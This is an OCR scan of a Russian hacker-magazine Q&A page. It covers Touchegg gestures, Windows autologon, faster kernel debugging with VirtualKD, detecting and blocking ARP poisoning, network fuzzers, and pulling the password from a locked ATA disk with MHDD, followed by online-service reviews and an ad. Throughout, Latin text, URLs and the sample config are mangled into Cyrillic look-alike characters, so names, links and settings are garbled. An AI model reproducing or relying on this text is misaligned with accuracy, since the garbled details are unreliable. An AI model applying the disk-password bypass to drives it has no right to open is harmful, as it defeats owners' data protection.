ТоисЬЕдд ( собе.доодІе.сот/рАоисбедд ), с 
помощью которой легко привязать к под- 
держиваемым жестам натачпаде различные 
действия. Установка программы достаточно 
проста, надо лишьубедиться в наличии необ- 
ходимых библиотек иТоисб и еѵбеѵ. Утилита не 
имеет какого-либо графического интерфейса, 
а все настройки выполняются в конфигура- 
ционном файле /изг/збагеЛоисЬедд.сопЕ 
Каждая запись в конфиге состоит изтрех ча- 
стей: названиежеста, действие, параметры. 
Допустим, ты хочешь, чтобы при проведении 
четырьмя пальцами снизу вверх у тебя менял- 
ся рабочий стол. Для этого нужно добавить в 
Іоисбедд. сонаследующую запись: 

#РОІЖ РІІЧСЕК5 йКАС 

[Р01ІК_РІІ\іеЕК5_0КА6_иР] 

ас1:іоп=СНАІ\І6Е_0Е5КТ0Р 

ве1:1:іп§5=0ІКЕСТІ0І\І=І_ЕРТ 

Для другихжестов и действий все выполняет- 
ся аналогично. Вся сопутствующая информа- 
ция хорошо описана в Мануэле. 

О: Как проще всего сделать автомати- 
ческий вход в систему (ѴѴіпсІоѵѵз 7)? 

А: Вообще говоря, возможность для на- 
стройки автоматического входа в систему 
есть в винде поумолчанию. Но стандартные 
средства, как известно, редко сделаны для 
людей, поэтому я чаще всего использую тулзу 
Аиіоіодоп ( іесЬпеІ.тісгозоІІ.сот/еп-из/ 
зузіп1:егпаІ5/ЬЬ963905 ) от Марка Руссинови- 



ХАКЕР 04 /147/ 201 1 



► 141 




сшпз 




Управление виртуальными машинами для работы ѴігіиаІКсі 



ча. Это 0111-приложение попроситуказать 
имя пользователя, пароль и домен, которые 
и будут использоваться для автоматиче- 
ского логона. Тулзу при необходимости 
можно использовать и из консоли, передав 
нужные значения в качестве ключей запуска: 
аиіоіодоп.ехе изегсіоппаіп раззѵѵогсі. 

О: По работе приходится дебажить 
глючный драйвер, но есть пробле- 
ма: ѴѴіпОВС работает отвратительно 
медленно! Как можно ускорить работу 
отладчика? 

А: Причина медлительности отладки заклю- 
чается в виртуальном СОМ-порте, который 
используется для обмена данными с хостом. 
Скорость такого порта ограничена 1 1 5200 
битами в секунду (то есть всего около 1 0 Кб/с), 
и хоть ты тресни, быстрее через него пере- 
даваться ничего не будет. Какбыть?Логично 
предположить, что можно заменить низко- 
скоростной виртуальный СОМ-портболее 
широким каналом. Этоттриклежит в основе 
проекта ѴігіиаІКсі ( ѵігІиаІксІ.БѴБргодз.огд ). 
который ускоряет отладку ядра ѴѴіпсіоѵѵб до 
сорока пяти разза счетиспользования вир- 
туальных машин на базеѴМѵѵаге и ѴігІиаІВох. 

В случае со связкой ѴѴіпОВС/КО для общения 
с отлаживаемой ОС вместо СОМ-порта ис- 
пользуется именованный канал (паппесі ріре): 
это повышаетскорость передачи до 450 Кб/с 
вслучаесѴігІиаІВохидо 150 Кб/с на ѴМѴѴаге. 

В результате мы можем дебажить драйвера 
ѴѴіпсіоѵѵб на виртуальных машинах, используя 
стандартный набор инструментов (ѴѴіпОВС/ 
КО), но со значительно более низким временем 
отклика. Помимо этого программа использует 
преимущества виртуальных машин, позволяя 
мгновенно останавливать работу гостевых ОС и 
автоматически восстанавливатьБпарзбоІ;, что 
сводит к минимуму количествотелодвижений. 
Среди других крутых фишек: автоматическая 
установка виртуальных машин. Все операции 



выполняются через понятный 0111-интерфейс. 
На официальном сайте есть подробный мануал 
по настройке. А в случае, если хочешь подру- 
жить ѴігіиаІКсі с плагином «ѴѴіпбЬд беЬиддег» 
— в ЮАРго рекомендую следующую инструк- 
цию : ЬехЫо^хшѴ2д^І23. 

О: Как отследить использования АВР 
Роізоп в локальной сети и противодей- 
ствовать ему? 

А: Давно известный прием АРР Роізоп по- 
прежнему позволяетуспешно перехватывать 
трафик между хостами в локальной сети 
(втом числе беспроводной). Если хочешь 
подтянуть матчасть, рекомендую нашу 
старую статью об АРР-зрообпд’е ( хакер.ги/ 
тада2Іпе/ха/068/060/2.а5р ). Теперь по сути 
вопроса. Начнем со способов обнаружения 
атаки. Если не брать в расчет серьезные 
Ю5 вроде БпогТа, то проще всего заюзать 
утилиту вроде ОесаНеіпаІЮ ( юпдеек.сот/ 
гіоѵѵпІоасІБ/сіесаІІеіпаІісІО.ОЭ.гі ), которая тихо 
сидитвтрее и предупреждает об активности 
с АРР-таблицей. Каждый раз, заметив, что 
МАС-адрес шлюза изменился, тулза будет 
выдавать сообщение. Помимо этого можно 
настроить уведомления о некоторых событиях 
из журнала ѴѴіпсіоѵѵб и логов файервола. 

Чтобы противодействовать атаке, рекомендую 
прогу АРРРгееіе ( ігопдеек.сот/сІоѵѵпІоасІБ/ 
агрігеегепд.гір ), позволяющую через удобный 
ОШ -интерфейс настроить статические записи 
в АРР-таблице, которые хакер уже никакие 
сможет заменитьс помощью Саіп & АЬеІ, 
Еиегсар, Агрзрооіили любых других утилит, 
и выполнить МІТМ-атаку. Тоже самое можно 
было сделать и стандартными инструментами 
винды (с помощью команд агр и пеізб), но 
АРРЕгееге сводит процесс фиксирования за- 
писей в АРР-таблице кдвум кликам мыши. 

О: Подскажи фаззер для тестирования 
сетевого приложения, который бы 



генерировал намеренно испорченные 
пакеты. Формат сообщений для обмена 
данными я более-менее представляю. 

А: Итак, речь идетобумном фаззинге, 
подразумевающем, что ты знаешьформат 
данных и, соответственно, можешь подо- 
гнать процесс мутации передаваемых дан- 
ных под своей конкретный случай. Есть два 
пути. Первый — использовать какой-нибудь 
мощный фреймворкдля фаззинга, напри- 
мер небезызвестный РеасЬ ( эеасЫиггег. 
сот ). Имей в виду, что если дела с ним 
раньше не имел, то придется порядочно 
повозиться с его настройкой: параметры 
сложного фаззинга и описание структуры 
протокола выполняются через специальные 
ХМЕ-файлы. Тебе придется описать формат 
обмена сообщениями сетевого приложе- 
ния, а также правила мутации отдельных 
элементов сетевого пакета. Впрочем, если 
задача несложная, то есть шанс, что удастся 
обойтись входящей в комплекте фрейм- 
ворком 6111 -утилитой, которая изначально 
заточена под простой фаззинг сетевых при- 
ложений. Второй вариант— написать фаззер 
самому. Звучит страшно, но на практике 
такой подход может оказаться намного про- 
ще, чем ковыряние с тем же самым Реасб’ем. 
Если взять простой язык программирования 
(скажем, Руібоп) и готовую библиотеку для 
конструирования пакетов (Всару. зессіеѵ.огд/ 
ргоіесІБ/зса і ), то написать простейший 
фаззер можно буквально за несколько минут. 
Не веришь? Тогда прочитай, на что способен 
этот модуль, и какего использовать, в нашей 
статье «Работа со скальпелем» ( хакер.ги/ 
тадагіпе/ха/1 26/028/1 .азр ). 

О: Попалась мне тут в руки редкая 
рыба — жесткий дискАТА, защищенный 
паролем! Честно говоря, вижу такой 
впервые и как обойти защиту не пред- 
ставляю. Как бы ее снять? 

А: Я помню, раньше были какие-то слож- 
ные методики для восстановления этого 
пароля, но сейчас все стало намного проще. 
Заветный ключ хранится в специальной 
защищенной зоне жесткого диска вместе с 
его прошивкой. Проблема втом, что ты не 
можешь обратиться к ней напрямую. Мето- 
дика обхода этого ограничения зависит от 
производителя РЮО. В большинстве случаев 
может выручить программа МЕЮО ( іИсІсІ.ги/ 
тЬсИ ), загруженная с флешки. С ее помощью 
удается обойти ограничения ВІОВ’а, который 
не позволяет считывать защищенные данные 
с жесткого диска, и обратиться напрямую к 
5АТА- или РАТА-контроллеру материнской 
платы. Получив дамп защищенной области, 
можно открыть его в любом НЕХ-редакторе и 
найти в открытом виде пароль пользователя, 
а также так называемый мастер-пароль. Под- 
робную инструкцию (в переводе с испанского) 
ты можешь прочитать по следующемулинку: 
ЫШу/разБ МсІ геігіѵе . -г 
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Бесплатный ѴРМ-сервис для 
шифрования трафика 






АЫ0ЫУАА01І5С0АТ 

апопутоиз.со.аі 

©Сложно поверить, но это по-настоящему бесплатный ѴРІЧ-сервис, 
позволяющий получить ІР-адрес в Голландии и передавать данные в 
зашифрованном виде. Это особенно важно, если ты часто работаешь в 
открытых беспроводных сетях, где отснифатьтрафик могут все, кому не 
лень. Решение построено на базе ОрепѴРІЧ, причем клиент реализован 
так, что тебе вообще не придется забивать голову вопросами настройки. 
Безопасное соединение активируется в один клик (еще один может по- 
надобиться для установки драйвера]. Слово «бесплатно» означает, что 
скорость соединения ограничена 51 2 кбит/с, а из портов открыты только 
80-й и 443-й. Понятна схема монетизации сервиса: хочешь избавиться 
от ограничений — необходимо немного заплатить. 



СЦІІСКОІРР 

диісксШ.сот 

О В большинстве интегрированных сред разработки сейчас встроены 
утилиты для визуального сравнения файлов. Широко распространены 
и отдельные утилиты, которые выполняют подобную операцию. На вход 
подается сначала версия исходника, затем — вторая версия, а на выходе 
получается документ, в котором наглядно отображены все найденные в 
них различия. Оказавшись в ситуации, когда никакого подходящего ПО 
под рукой не было, я воспользовался для сравнения файлов этим онлай- 
новым ОиісксШ. Сервис ничуть не хуже настольного софта произвел по- 
иск несовпадающих фрагментов и выделил цветом все различия. Скажу 
больше:теперь, когда необходимо сравнить не целые файлы, а лишь 
их фрагменты (а создавать временные документы для этого неохота], я 
всегда использую именно этот сервис. 
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Распознавание текста 
онлайн 



оск оімные 

осгопііпе.сот 

О Каждый знает, что распознать тексте отсканированной страницы 
книги и преобразовать его в обычный документ позволяет известная 
программа от АВВУУ — Рі пе Реасіег. Проблемы тут две. Во-первых, 
приложение платное, а во-вторых, оказывается под рукой далеко не 
всегда. Втакой ситуации лучшей заменой может стать онлайн-сервис 
ОС В Опііпе. В отличие от многих других решений, он поддерживает рас- 
познаваниетекста на русском языке. И это на самом деле вполне сносно 
работает! Правда, необходимо в явном виде указывать, что обрабаты- 
ваемое изображение содержит кириллические символы: разработчики 
хотя и хвастают автоматическим распознаванием языка, работает этот 
механизм фигово. 




АѴІАРѴ 

аѵіагу.сот 

О Недавно мне понадобилось записать небольшой подкаст и сделать 
монтаж. Один знакомый шутливо посоветовал не ставить никакие про- 
граммы и за юзать онлайн-сервис Аиб іо Ехргеіі. 

Ему, конечно, такой подход казался профанацией. А я же отлично 
записал с его помощью десять минутаудио, вырезал ненужные фраг- 
менты, добавил джинглы и преобразовал готовый файл в нужный 
формат. По-сути, АисІіоЕхргегІ; — это простейший аудиоредактор, 
цифровой диктофон и конвертер, поддерживающий десяток разных 
форматов, одновременно. Примечательно, что оттехже самых раз- 
работчиков есть еще и простенький, но тоже онлайновый редактор 
видеофайлов. 
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ТОНКОЕ ЧУВСТВО 

стиля 




Каждый шедевр достоин соответ- 
ствующего обрамления. Поэтому Ю 
создали коллекцию ЬЕР-мониторов 
Зырег 51іт. Исключительно тонкий 
корпус, ограненный простыми и 
изящными линиями, скрывает в себе 
самые современные технологии, 
обеспечивающие яркое живое 
изображение. І-ЕР-монитор Ю 
Зырег ЗІІт станет стильным украше- 
нием интерьера Вашего дома. 
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КЗ Е60 ЮЕ80 ЮЕ81 Ю Е90 



І-ЕИ-мониторы Ю серии Зырег ЗІІт 



Информационная служба 
Ю ЕІесігопісз 8-800-200-76-76 
(бесплатная горячая линия по России). 




